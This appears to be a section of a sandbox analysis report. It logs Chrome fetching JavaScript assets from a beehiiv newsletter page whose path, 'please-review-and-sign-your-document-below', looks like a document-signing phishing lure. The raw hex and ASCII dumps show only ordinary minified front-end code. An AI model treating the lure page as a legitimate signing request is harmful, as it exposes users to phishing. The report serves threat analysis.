                                                                                                                                            2025-01-15 18:14:35 UTC16384INData Raw: 3b 64 65 6c 65 74 65 20 74 68 69 73 2e 62 61 74 63 68 2e 68 61 73 68 5b 74 5d 2c 7e 72 26 26 6e 2e 73 70 6c 69 63 65 28 72 2c 31 29 7d 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 46 72 61 6d 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 66 72 61 6d 65 73 2e 69 6e 64 65 78 4f 66 28 74 29 3b 7e 65 26 26 74 68 69 73 2e 66 72 61 6d 65 73 2e 73 70 6c 69 63 65 28 65 2c 31 29 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 73 63 68 65 64 75 6c 65 42 61 74 63 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 3b 74 68 69 73 2e 73 63 68 65 64 75 6c 65 28 30 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 62 61 74 63 68 2e 73 63 68 65 64 75 6c 65 64 3d 21 31 2c 74 2e 72 75 6e 42 61 74 63 68 28 29 7d 29 2c 74 68 69 73
                                                                                                                                            Data Ascii: ;delete this.batch.hash[t],~r&&n.splice(r,1)}},o.prototype.clearFrame=function(t){var e=this.frames.indexOf(t);~e&&this.frames.splice(e,1)},o.prototype.scheduleBatch=function(){var t=this;this.schedule(0,function(){t.batch.scheduled=!1,t.runBatch()}),this
                                                                                                                                            2025-01-15 18:14:35 UTC16384INData Raw: 6c 29 3b 22 76 69 73 69 62 6c 65 22 3d 3d 74 2e 73 61 6e 64 62 6f 78 45 6c 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3f 74 2e 5f 77 69 64 74 68 3d 6e 2e 77 69 64 74 68 3a 28 65 3d 6c 28 74 2e 73 61 6e 64 62 6f 78 45 6c 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 2e 77 69 64 74 68 2c 74 2e 5f 77 69 64 74 68 3d 4d 61 74 68 2e 6d 69 6e 28 6e 2e 77 69 64 74 68 2c 65 29 29 2c 74 2e 5f 68 65 69 67 68 74 3d 6e 2e 68 65 69 67 68 74 7d 29 7d 29 2c 74 2e 64 65 66 69 6e 65 28 22 5f 64 69 64 52 65 73 69 7a 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 65 3d 74 68 69 73 2e 5f 72 65 73 69 7a 65 48 61 6e 64 6c 65 72 73 2e 73 6c 69 63 65 28 30 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 75 70 64 61 74 65 43 61 63 68 65 64 44 69 6d
                                                                                                                                            Data Ascii: l);"visible"==t.sandboxEl.style.visibility?t._width=n.width:(e=l(t.sandboxEl.parentElement).width,t._width=Math.min(n.width,e)),t._height=n.height})}),t.define("_didResize",function(){var t=this,e=this._resizeHandlers.slice(0);return this._updateCachedDim
                                                                                                                                            2025-01-15 18:14:35 UTC11145INData Raw: 6e 65 72 2d 73 63 72 65 65 6e 2d 6e 61 6d 65 22 29 2c 6c 69 73 74 4f 77 6e 65 72 55 73 65 72 49 64 3a 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6c 69 73 74 2d 6f 77 6e 65 72 2d 69 64 22 29 2c 6c 69 73 74 49 64 3a 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6c 69 73 74 2d 69 64 22 29 2c 6c 69 73 74 53 6c 75 67 3a 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6c 69 73 74 2d 73 6c 75 67 22 29 2c 63 75 73 74 6f 6d 54 69 6d 65 6c 69 6e 65 49 64 3a 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 63 75 73 74 6f 6d 2d 74 69 6d 65 6c 69 6e 65 2d 69 64 22 29 2c 73 74 61 74 69 63 43 6f 6e 74 65 6e 74 3a 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 74 61 74 69 63 2d 63 6f 6e
                                                                                                                                            Data Ascii: ner-screen-name"),listOwnerUserId:t.getAttribute("data-list-owner-id"),listId:t.getAttribute("data-list-id"),listSlug:t.getAttribute("data-list-slug"),customTimelineId:t.getAttribute("data-custom-timeline-id"),staticContent:t.getAttribute("data-static-con


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            41192.168.2.1649756104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:34 UTC839OUTGET /assets/bugs-DVQzBh-s.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:34 UTC911INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:34 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 900
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"384-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4161
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8a24b1542ad-EWR
                                                                                                                                            2025-01-15 18:14:34 UTC458INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 65 39 61 37 36 34 30 36 2d 63 39 30 39 2d 35 38 30 38 2d 62 30 39 66 2d 36 37 63 36 66 34 30 37 62 37 37 34 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="e9a76406-c909-5808-b09f-67c6f407b774")}catch(
                                                                                                                                            2025-01-15 18:14:34 UTC442INData Raw: 6d 65 6e 74 2c 6e 3d 6e 75 6c 6c 3b 66 6f 72 28 3b 65 26 26 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 46 69 65 6c 64 53 65 74 45 6c 65 6d 65 6e 74 29 3b 29 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 4c 65 67 65 6e 64 45 6c 65 6d 65 6e 74 26 26 28 6e 3d 65 29 2c 65 3d 65 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 3b 6c 65 74 20 72 3d 65 3f 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 3d 3d 3d 22 22 3b 72 65 74 75 72 6e 20 72 26 26 6f 28 6e 29 3f 21 31 3a 72 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 74 29 7b 69 66 28 21 74 29 72 65 74 75 72 6e 21 31 3b 6c 65 74 20 65 3d 74 2e 70 72 65 76 69 6f 75 73 45 6c 65 6d 65 6e 74 53 69 62 6c 69 6e 67 3b 66 6f 72 28 3b 65 21 3d 3d 6e 75 6c 6c 3b 29 7b 69 66 28 65 20 69 6e
                                                                                                                                            Data Ascii: ment,n=null;for(;e&&!(e instanceof HTMLFieldSetElement);)e instanceof HTMLLegendElement&&(n=e),e=e.parentElement;let r=e?.getAttribute("disabled")==="";return r&&o(n)?!1:r}function o(t){if(!t)return!1;let e=t.previousElementSibling;for(;e!==null;){if(e in


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            42192.168.2.1649758104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:34 UTC845OUTGET /assets/transition-y-5XFFuu.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:34 UTC914INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:34 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 10089
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"2769-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4161
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8a25c4f0f9b-EWR
                                                                                                                                            2025-01-15 18:14:34 UTC455INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 61 61 64 34 35 35 36 65 2d 32 35 65 37 2d 35 30 31 36 2d 62 66 31 64 2d 31 33 61 33 31 39 32 39 33 63 36 62 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="aad4556e-25e7-5016-bf1d-13a319293c6b")}catch(
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 65 2c 6f 20 61 73 20 4c 2c 67 20 61 73 20 72 65 2c 43 20 61 73 20 61 65 7d 66 72 6f 6d 22 2e 2f 6b 65 79 62 6f 61 72 64 2d 43 61 45 75 32 6f 30 75 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 70 20 61 73 20 6f 65 7d 66 72 6f 6d 22 2e 2f 62 75 67 73 2d 44 56 51 7a 42 68 2d 73 2e 6a 73 22 3b 66 75 6e 63 74 69 6f 6e 20 54 65 28 29 7b 72 65 74 75 72 6e 2f 69 50 68 6f 6e 65 2f 67 69 2e 74 65 73 74 28 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 70 6c 61 74 66 6f 72 6d 29 7c 7c 2f 4d 61 63 2f 67 69 2e 74 65 73 74 28 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 70 6c 61 74 66 6f 72 6d 29 26 26 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 6d 61 78 54 6f 75 63 68 50 6f 69 6e 74 73 3e 30 7d 66 75 6e 63 74 69 6f 6e 20 43 65 28 29 7b 72 65 74 75 72 6e 2f 41
                                                                                                                                            Data Ascii: e,o as L,g as re,C as ae}from"./keyboard-CaEu2o0u.js";import{p as oe}from"./bugs-DVQzBh-s.js";function Te(){return/iPhone/gi.test(window.navigator.platform)||/Mac/gi.test(window.navigator.platform)&&window.navigator.maxTouchPoints>0}function Ce(){return/A
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 64 6f 77 6e 22 2c 69 3d 3e 7b 76 61 72 20 64 2c 6e 3b 6c 2e 63 75 72 72 65 6e 74 26 26 28 66 2e 63 75 72 72 65 6e 74 3d 28 28 6e 3d 28 64 3d 69 2e 63 6f 6d 70 6f 73 65 64 50 61 74 68 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 69 29 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 6e 5b 30 5d 29 7c 7c 69 2e 74 61 72 67 65 74 29 7d 2c 21 30 29 2c 6b 28 22 63 6c 69 63 6b 22 2c 69 3d 3e 7b 46 65 28 29 7c 7c 66 2e 63 75 72 72 65 6e 74 26 26 28 63 28 69 2c 28 29 3d 3e 66 2e 63 75 72 72 65 6e 74 29 2c 66 2e 63 75 72 72 65 6e 74 3d 6e 75 6c 6c 29 7d 2c 21 30 29 2c 6b 28 22 74 6f 75 63 68 65 6e 64 22 2c 69 3d 3e 63 28 69 2c 28 29 3d 3e 69 2e 74 61 72 67 65 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 3f 69 2e 74 61 72
                                                                                                                                            Data Ascii: down",i=>{var d,n;l.current&&(f.current=((n=(d=i.composedPath)==null?void 0:d.call(i))==null?void 0:n[0])||i.target)},!0),k("click",i=>{Fe()||f.current&&(c(i,()=>f.current),f.current=null)},!0),k("touchend",i=>c(i,()=>i.target instanceof HTMLElement?i.tar
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 30 5d 3d 6e 2e 73 70 6c 69 74 28 22 2c 22 29 2e 66 69 6c 74 65 72 28 42 6f 6f 6c 65 61 6e 29 2e 6d 61 70 28 73 3d 3e 73 2e 69 6e 63 6c 75 64 65 73 28 22 6d 73 22 29 3f 70 61 72 73 65 46 6c 6f 61 74 28 73 29 3a 70 61 72 73 65 46 6c 6f 61 74 28 73 29 2a 31 65 33 29 2e 73 6f 72 74 28 28 73 2c 6d 29 3d 3e 6d 2d 73 29 3b 72 65 74 75 72 6e 20 6f 7d 29 2c 64 3d 66 2b 69 3b 69 66 28 64 21 3d 3d 30 29 7b 72 2e 67 72 6f 75 70 28 6f 3d 3e 7b 6f 2e 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 7b 74 28 29 2c 6f 2e 64 69 73 70 6f 73 65 28 29 7d 2c 64 29 2c 6f 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 65 2c 22 74 72 61 6e 73 69 74 69 6f 6e 72 75 6e 22 2c 73 3d 3e 7b 73 2e 74 61 72 67 65 74 3d 3d 3d 73 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 26 26 6f 2e 64
                                                                                                                                            Data Ascii: 0]=n.split(",").filter(Boolean).map(s=>s.includes("ms")?parseFloat(s):parseFloat(s)*1e3).sort((s,m)=>m-s);return o}),d=f+i;if(d!==0){r.group(o=>{o.setTimeout(()=>{t(),o.dispose()},d),o.addEventListener(e,"transitionrun",s=>{s.target===s.currentTarget&&o.d
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 2e 66 69 6c 74 65 72 28 74 3d 3e 74 2e 6c 65 6e 67 74 68 3e 31 29 7d 6c 65 74 20 55 3d 61 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 6e 75 6c 6c 29 3b 55 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 54 72 61 6e 73 69 74 69 6f 6e 43 6f 6e 74 65 78 74 22 3b 76 61 72 20 4e 65 3d 28 65 3d 3e 28 65 2e 56 69 73 69 62 6c 65 3d 22 76 69 73 69 62 6c 65 22 2c 65 2e 48 69 64 64 65 6e 3d 22 68 69 64 64 65 6e 22 2c 65 29 29 28 4e 65 7c 7c 7b 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 4f 65 28 29 7b 6c 65 74 20 65 3d 61 2e 75 73 65 43 6f 6e 74 65 78 74 28 55 29 3b 69 66 28 65 3d 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 20 3c 54 72 61 6e 73 69 74 69 6f 6e 2e 43 68 69 6c 64 20 2f 3e 20 69 73 20 75 73 65 64 20 62 75 74 20 69 74 20 69 73 20 6d 69
                                                                                                                                            Data Ascii: .filter(t=>t.length>1)}let U=a.createContext(null);U.displayName="TransitionContext";var Ne=(e=>(e.Visible="visible",e.Hidden="hidden",e))(Ne||{});function Oe(){let e=a.useContext(U);if(e===null)throw new Error("A <Transition.Child /> is used but it is mi
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 7b 6e 2e 63 75 72 72 65 6e 74 2e 70 75 73 68 28 75 29 7d 29 5d 29 2c 74 3f 2e 63 68 61 69 6e 73 2e 63 75 72 72 65 6e 74 5b 76 5d 2e 70 75 73 68 28 5b 67 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 75 3d 3e 7b 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 73 2e 63 75 72 72 65 6e 74 5b 76 5d 2e 6d 61 70 28 28 5b 79 2c 53 5d 29 3d 3e 53 29 29 2e 74 68 65 6e 28 28 29 3d 3e 75 28 29 29 7d 29 5d 29 2c 76 3d 3d 3d 22 65 6e 74 65 72 22 3f 6f 2e 63 75 72 72 65 6e 74 3d 6f 2e 63 75 72 72 65 6e 74 2e 74 68 65 6e 28 28 29 3d 3e 74 3f 2e 77 61 69 74 2e 63 75 72 72 65 6e 74 29 2e 74 68 65 6e 28 28 29 3d 3e 70 28 76 29 29 3a 70 28 76 29 7d 29 2c 62 3d 4c 28 28 67 2c 76 2c 70 29 3d 3e 7b 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 73 2e 63 75 72 72 65 6e 74 5b 76 5d 2e 73 70 6c 69 63 65 28 30
                                                                                                                                            Data Ascii: {n.current.push(u)})]),t?.chains.current[v].push([g,new Promise(u=>{Promise.all(s.current[v].map(([y,S])=>S)).then(()=>u())})]),v==="enter"?o.current=o.current.then(()=>t?.wait.current).then(()=>p(v)):p(v)}),b=L((g,v,p)=>{Promise.all(s.current[v].splice(0
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 7d 29 2c 4d 3d 41 65 28 7b 62 65 66 6f 72 65 45 6e 74 65 72 3a 63 2c 61 66 74 65 72 45 6e 74 65 72 3a 66 2c 62 65 66 6f 72 65 4c 65 61 76 65 3a 69 2c 61 66 74 65 72 4c 65 61 76 65 3a 64 7d 29 2c 56 3d 69 65 28 29 3b 61 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 69 66 28 56 26 26 78 3d 3d 3d 22 76 69 73 69 62 6c 65 22 26 26 75 2e 63 75 72 72 65 6e 74 3d 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 44 69 64 20 79 6f 75 20 66 6f 72 67 65 74 20 74 6f 20 70 61 73 73 74 68 72 6f 75 67 68 20 74 68 65 20 60 72 65 66 60 20 74 6f 20 74 68 65 20 61 63 74 75 61 6c 20 44 4f 4d 20 6e 6f 64 65 3f 22 29 7d 2c 5b 75 2c 78 2c 56 5d 29 3b 6c 65 74 20 66 65 3d 5a 26 26 21 24 2c 74 65 3d 24 26 26 68 26 26 5a 2c 76 65 3d 21 56 7c 7c 66 65 3f 22
                                                                                                                                            Data Ascii: }),M=Ae({beforeEnter:c,afterEnter:f,beforeLeave:i,afterLeave:d}),V=ie();a.useEffect(()=>{if(V&&x==="visible"&&u.current===null)throw new Error("Did you forget to passthrough the `ref` to the actual DOM node?")},[u,x,V]);let fe=Z&&!$,te=$&&h&&Z,ve=!V||fe?"
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 75 6c 6c 26 26 28 72 3d 28 6e 26 77 2e 4f 70 65 6e 29 3d 3d 3d 77 2e 4f 70 65 6e 29 2c 21 5b 21 30 2c 21 31 5d 2e 69 6e 63 6c 75 64 65 73 28 72 29 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 20 3c 54 72 61 6e 73 69 74 69 6f 6e 20 2f 3e 20 69 73 20 75 73 65 64 20 62 75 74 20 69 74 20 69 73 20 6d 69 73 73 69 6e 67 20 61 20 60 73 68 6f 77 3d 7b 74 72 75 65 20 7c 20 66 61 6c 73 65 7d 60 20 70 72 6f 70 2e 22 29 3b 6c 65 74 5b 6f 2c 73 5d 3d 61 2e 75 73 65 53 74 61 74 65 28 72 3f 22 76 69 73 69 62 6c 65 22 3a 22 68 69 64 64 65 6e 22 29 2c 6d 3d 73 65 28 28 29 3d 3e 7b 73 28 22 68 69 64 64 65 6e 22 29 7d 29 2c 5b 62 2c 67 5d 3d 61 2e 75 73 65 53 74 61 74 65 28 21 30 29 2c 76 3d 61 2e 75 73 65 52 65 66 28 5b 72 5d 29 3b 51 28 28 29 3d 3e 7b 62 21 3d
                                                                                                                                            Data Ascii: ull&&(r=(n&w.Open)===w.Open),![!0,!1].includes(r))throw new Error("A <Transition /> is used but it is missing a `show={true | false}` prop.");let[o,s]=a.useState(r?"visible":"hidden"),m=se(()=>{s("hidden")}),[b,g]=a.useState(!0),v=a.useRef([r]);Q(()=>{b!=
                                                                                                                                            2025-01-15 18:14:34 UTC51INData Raw: 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 61 61 64 34 35 35 36 65 2d 32 35 65 37 2d 35 30 31 36 2d 62 66 31 64 2d 31 33 61 33 31 39 32 39 33 63 36 62 0a
                                                                                                                                            Data Ascii: //# debugId=aad4556e-25e7-5016-bf1d-13a319293c6b


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            43192.168.2.1649759104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:34 UTC559OUTGET /assets/useTranslation-CfKJAmGY.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:34 UTC897INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:34 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 4087
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"ff7-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8a29b822394-EWR
